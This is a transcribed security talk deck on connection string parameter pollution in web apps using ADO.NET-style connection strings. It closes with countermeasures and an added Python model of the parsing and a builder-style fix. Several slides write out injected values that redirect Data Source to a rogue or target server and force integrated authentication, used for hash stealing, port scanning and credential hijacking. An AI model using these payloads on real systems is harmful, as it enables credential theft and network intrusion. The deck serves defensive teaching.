Parameter Pollution in Connection Strings Attack

Jul 29, 2020

Page 1

Connection Strings

• Define the way an application connects to a data repository

• There are connection strings for:
  – Relational Databases (MSSQL, Oracle, MySQL, …)
  – LDAP Directories
  – Files (XML, plain, csv, xls, mdb, …)
  – Etc…

Page 2

Database Connection Strings

Data Source=myServerAddress;Initial Catalog=myDataBase;User Id=myUsername;Password=myPassword;

Page 3

DB Connection build-up

Page 4

Google Hacking

Page 5

Google Hacking

Page 6

UDL (Universal Data Links) Files

Page 7

How the Web app connects to the DB

Operating System Accounts:

Data Source=myServerAddress;Initial Catalog=myDataBase;User Id=;Password=;Integrated Security=SSPI/True/Yes;

Database Credentials:

Data Source=myServerAddress;Initial Catalog=myDataBase;User Id=myUsername;Password=myPassword;Integrated Security=No;

Page 8

Web application manages the login process (users authenticated by the Web App)

Diagram labels: Database Engine (Syslogins, Custom users table) | App running on Web Server (Connection string)

1. Web application connects to the database using its own credentials.

2. Asks the user for login information.

3. Checks the login information against the info stored in the custom users table:

Select id from users

Page 9

Database engine manages the login process (users authenticated by the Database)

Diagram labels: Database Engine (Syslogins) | App running on Web Server (Connection string)

1. Web application asks for credentials.

2. A connection string is composed with those credentials to connect to the database.

3. Roles and permissions are limited to those of the user used in the connection string.

Page 10

Connection String Attacks

• It's possible to inject parameters into connection strings using semicolons as a separator

Data Source=myServerAddress;Initial Catalog=myDataBase;Integrated Security=NO;User Id=myUsername;Password=myPassword;Encryption=Off;

Page 11

Connection String Builder

• Available in .NET Framework 2.0

• Builds secure connection strings using parameters

• It's not possible to inject into the connection string

Page 12

Are people aware of this?

Page 13

Connection String Parameter Pollution

• The goal is to inject parameters into the connection string, whether they already exist or not

• If a parameter is duplicated, the last value wins

• This behavior allows attackers to completely overwrite the connection string, and therefore to manipulate the way the application works and how it authenticates

Page 14

DB Connection Object: pollutable behavior

Diagram: a DB Connection Object with fields Param1 and Param2 receives the sequence Param1=ValueA Param2=ValueB Param1=ValueC Param2=ValueD

Page 15

What can be done with CSPP? Overwrite a parameter

Diagram: a DB Connection Object with fields DataSource, UID and password receives DataSource=DB1 UID=sa DataSource=DB2 password=Pwnd!

Page 16

Scanning the DMZ

Diagram: Internet -> FW -> Web app vulnerable to CSPP; the DataSource parameter is pointed at the internal databases: Development Database 1, Financial Database, Test Database, Forgotten Database, Production Database

Page 17

Port Scanning a Server

Diagram: Internet -> FW -> Web app vulnerable to CSPP -> Production Database Server; the DataSource parameter is set to DB1,80 / DB1,21 / DB1,25 / DB1,1445

Page 18

What can be done with CSPP? Add a parameter

Diagram: a DB Connection Object with fields DataSource, UID and password receives DataSource=DB1 UID=sa IntegratedSecurity=True password=Pwnd!

Page 19

CSPP Attack 1: Hash stealing

1. Run a Rogue Server on an accessible IP address: Rogue_Server

2. Activate a sniffer to catch the login process: Cain/Wireshark

3. Overwrite the DataSource parameter: Data_Source=Rogue_Server

4. Force Windows Integrated Authentication: IntegratedSecurity=true

Page 20

CSPP Attack 1: Hash stealing

Data Source=SQL2005;initial catalog=db1;Integrated Security=no;user id=+'User_Value'+;Password=+'Password_Value'+;

Data Source=SQL2005;initial catalog=db1;Integrated Security=no;user id=;Data Source=Rogue_Server;Password=;Integrated Security=True;

Page 21

CSPP 1: ASP.NET Enterprise Manager

Page 22

CSPP Attack 2: Port Scanning

1. Duplicate the DataSource parameter, setting the target server and target port to be scanned: Data_Source=Target_Server,target_Port

2. Check the error messages:

  – No TCP Connection -> Port is closed

  – No SQL Server -> Port is open

  – Invalid Password -> SQL Server there!

Page 23

CSPP Attack 2: Port Scanning

Data Source=SQL2005;initial catalog=db1;Integrated Security=no;user id=+'User_Value'+;Password=+'Password_Value'+;

Data Source=SQL2005;initial catalog=db1;Integrated Security=no;user id=;Data Source=Target_Server,Target_Port;Password=;Integrated Security=True;

Page 24

CSPP 2: myLittleAdmin

Port is Open

Page 25

CSPP 2: myLittleAdmin

Port is Closed

Page 26

CSPP Attack 3: Hijacking Web Credentials

1. Duplicate the DataSource parameter to point at the target SQL Server: Data_Source=Target_Server

2. Force Windows Authentication: IntegratedSecurity=true

3. The application pool in which the web app is running will send its credentials in order to log into the database engine.

Page 27

CSPP Attack 3: Hijacking Web Credentials

Data Source=SQL2005;initial catalog=db1;Integrated Security=no;user id=+'User_Value'+;Password=+'Password_Value'+;

Data Source=SQL2005;initial catalog=db1;Integrated Security=no;user id=;Data Source=Target_Server;Password=;Integrated Security=true;

Page 28

CSPP Attack 3: Web Data Administrator

Page 29

CSPP Attack 3: myLittleAdmin / myLittleBackup

Page 30

CSPP Attack 3: ASP.NET Enterprise Manager

Page 31

Other Databases

• MySQL
  – Does not support Integrated Security
  – It's nevertheless possible to manipulate the behavior of the web application:
    • Port Scanning
    • Connect to internal / testing / development databases
    • Steal credentials

• Oracle supports integrated authentication running on Windows and UNIX/Linux servers
  – It's possible to perform all the described attacks:
    • Hash stealing
    • Port Scanning
    • Hijacking Web credentials
  – It's also possible to elevate a connection to sysdba in order to shut down / start up an instance

Page 32

Demo

Page 33

Scanner

• Proof of concept to test your network

• Tries a hijacking web credentials attack

• Written in ASP.NET C#

• Free download (code included, of course): http://www.informatica64.com/csppScanner.aspx

Page 34

CSPP Scanner

Page 35

Scanner CSPP: Attacks

Page 36

Demo

Page 37

myLittleAdmin / myLittleBackup

myLittleTools released a security advisory and a patch about this

Page 38

ASP.NET Enterprise Manager

• ASP.NET Enterprise Manager is "abandoned", but it's still being used in a lot of web Control Panels.

• Fix the code yourself

Page 39

ASP.NET Enterprise Manager

Page 40

ASP.NET Web Data Administrator

ASP.NET Web Data Administrator is secure on the CodePlex website, but not on the Microsoft website, where an insecure old version was published

Page 41

Countermeasures

• Harden your firewall
  – Outbound connections

• Review your internal accounts policy
  – Web application
  – Web server
  – Database Engine

• Use ConnectionStringBuilder

• Filter the ";" ;)
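Added example, written for this transcript and not taken from the deck or from the Informática64 scanner: a Python model of the "last value wins" parsing behind the CSPP slides (pages 13 to 20) and of the ConnectionStringBuilder and "filter the ;" countermeasures above. The parser is an assumed, simplified approximation of ADO.NET's grammar (quote doubling is omitted) and the polluted login values are the ones from page 20.

```python
# Added example, not the deck's code: a simplified model of ADO.NET's
# "key=value;" parsing (last duplicate key wins, quoted values keep ';'),
# the concatenation the slides attack, and the builder-style fix plus check.
TEMPLATE = "Data Source=SQL2005;Initial Catalog=db1;Integrated Security=no;"

def parse_connection_string(cs):
    """Keys trimmed, case-insensitive; last duplicate wins; quotes protect ';'."""
    params, i, n = {}, 0, len(cs)
    while i < n:
        if cs[i] in "; ":               # skip separators and empty segments
            i += 1
            continue
        eq = cs.find("=", i)
        if eq == -1:
            break
        key = cs[i:eq].strip().lower()
        j = eq + 1
        while j < n and cs[j] == " ":
            j += 1
        if j < n and cs[j] in "\"'":    # quoted value: ';' inside is data
            end = cs.index(cs[j], j + 1)  # ValueError if unterminated
            value, nxt = cs[j + 1:end], cs.find(";", end)
        else:
            nxt = cs.find(";", j)
            value = cs[j:nxt if nxt != -1 else n].strip()
        params[key] = value             # duplicate key: the last value wins
        i = n if nxt == -1 else nxt + 1
    return params

def vulnerable_compose(user, password):
    """Concatenation as on the attack slides: input lands unquoted."""
    return f"{TEMPLATE}User Id={user};Password={password};"

def quote_value(value):
    """Builder-style quoting so ';' or a quote inside a value stays data."""
    if '"' in value and "'" in value:
        raise ValueError("value contains both quote characters; reject it")
    if '"' in value:
        return f"'{value}'"
    return f'"{value}"' if ";" in value or "'" in value else value

def safe_compose(user, password):
    """Same string with quoted values, as a connection-string builder does."""
    return f"{TEMPLATE}User Id={quote_value(user)};Password={quote_value(password)};"

def check_expected(cs, expected_server):
    """Pre-connect guard: Data Source unchanged and Integrated Security still off."""
    p = parse_connection_string(cs)
    return (p.get("data source", "").lower() == expected_server.lower()
            and p.get("integrated security", "no").lower() in ("no", "false"))
```

Feeding the page-20 values into vulnerable_compose yields Data Source=Rogue_Server and Integrated Security=True after parsing, while safe_compose keeps them inside the quoted User Id and Password values and check_expected accepts only the latter.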

Page 42

Questions?

Contact: Chema Alonso, chema@informatica64.com, http://www.informatica64.com, http://elladodelmal.blogspot.com, http://twitter.com/chemaalonso

Authors: Chema Alonso, Manuel Fernández "The Sur", Alejandro Martín Bailón, Antonio Guzmán